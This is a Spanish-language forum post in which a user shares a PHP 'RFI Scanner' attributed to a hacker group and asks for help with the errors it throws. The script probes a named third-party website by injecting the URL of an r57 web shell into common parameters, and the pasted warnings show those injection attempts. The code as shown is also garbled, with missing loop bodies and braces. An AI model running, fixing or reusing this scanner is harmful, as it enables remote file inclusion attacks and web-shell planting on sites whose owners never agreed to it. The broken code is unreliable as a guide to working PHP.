El code es este por si lo quieren probar:
Código
<html> <bogy> <? /* RFI Scanner 1.0 Author: elefrEn Website: http://elefren.com/ email: efnworkz@hotmail.com Dedicated to Spanish Hackers Team - http://spanish-hackers.com/ Gr33tz: -> JosS | nhh-32 | Omega <- */ #Config $urlweb = "http://www.aeev.net";# Out http://, ex: google.com $urlshell = "http://xxxxxxxxxxx/shell/r57.txt";# Url where you sent the shell script $comunvars = "cual|admindir|sec|id|file|doc|module|modulo|name";# Comun vars vulns to RFI in cms´s, etc... $filetoscan = "index.php";# The file that you want scan #Funcs function vars($url){ $var = 0; $m0s .= '|'.$v4r[0]; $var++; } return $m0s; } function beerres($list, $barras = FALSE){ $s3p4 = '<br>'; if($barras) $s3p4 = '|'; $var = 0; if($list[$var] != ''){ $m0s .= $list[$var].$s3p4; } } $var++; } return $m0s; } function extrac($n00b, $file = FALSE){ $n0ob = 'http://'.$n00b; $var = 0; while($var < $t0t){ $urllist .= $xtr[0].'|'; $varlist .= vars($xtr[0]); $var++; } $m0s .= $varlist; return beerres($m0s,1); } function rfi($vars,$web,$file,$urlshell){ $var = 0; $url = $web.$file."?".$list[$var]."=".$urlshell."?"; $m0s .= "<font color=red><b>RFI-></b></font> "; }else{ $m0s .= "<font color=green><b>Secure-></b></font> "; } $m0s .= $url.'<br>'; $var++; } return $m0s; } #Exec echo rfi(extrac($urlweb).$comunvars,'http://'.$urlweb.'/',$filetoscan,$urlshell); ?> </body>
Los errores son estos:
Código
Warning: file() [function.file]: php_network_getaddresses: getaddrinfo failed: Host desconocido. in C:\AppServ\www\www2\shell\scannerrfi.php on line 52 Warning: file(http://http://www.aeev.net) [function.file]: failed to open stream: No error in C:\AppServ\www\www2\shell\scannerrfi.php on line 52 Warning: join() [function.join]: Bad arguments. in C:\AppServ\www\www2\shell\scannerrfi.php on line 52 Warning: file() [function.file]: php_network_getaddresses: getaddrinfo failed: Host desconocido. in C:\AppServ\www\www2\shell\scannerrfi.php on line 70 Warning: file(http://http://www.aeev.net/index.php?cual=http://xxxxxxxxxxxxxxx/shell/r57.txt?) [function.file]: failed to open stream: No error in C:\AppServ\www\www2\shell\scannerrfi.php on line 70 Warning: join() [function.join]: Bad arguments. in C:\AppServ\www\www2\shell\scannerrfi.php on line 70 Warning: file() [function.file]: php_network_getaddresses: getaddrinfo failed: Host desconocido. in C:\AppServ\www\www2\shell\scannerrfi.php on line 70 Warning: file(http://http://www.aeev.net/index.php?admindir=http://xxxxxxxxxxxxxx.org/shell/r57.txt?) [function.file]: failed to open stream: No error in C:\AppServ\www\www2\shell\scannerrfi.php on line 70 Warning: join() [function.join]: Bad arguments. in C:\AppServ\www\www2\shell\scannerrfi.php on line 70 Warning: file() [function.file]: php_network_getaddresses: getaddrinfo failed: Host desconocido. in C:\AppServ\www\www2\shell\scannerrfi.php on line 70 Warning: file(http://http://www.aeev.net/index.php?sec=http://xxxxxxxxxx.org/shell/r57.txt?) [function.file]: failed to open stream: No error in C:\AppServ\www\www2\shell\scannerrfi.php on line 70 Warning: join() [function.join]: Bad arguments. in C:\AppServ\www\www2\shell\scannerrfi.php on line 70
Laa linea 52 contiene esto: function extrac($n00b, $file = FALSE){
Y la 70: $var = 0;
Así unas cuantas de veces asta llegar al final de la web donde ya me sale lo que debería de salir, aunque dan mal el resultado... por los errores supongo.
Espero su ayuda, gracias de antemano.
Saludos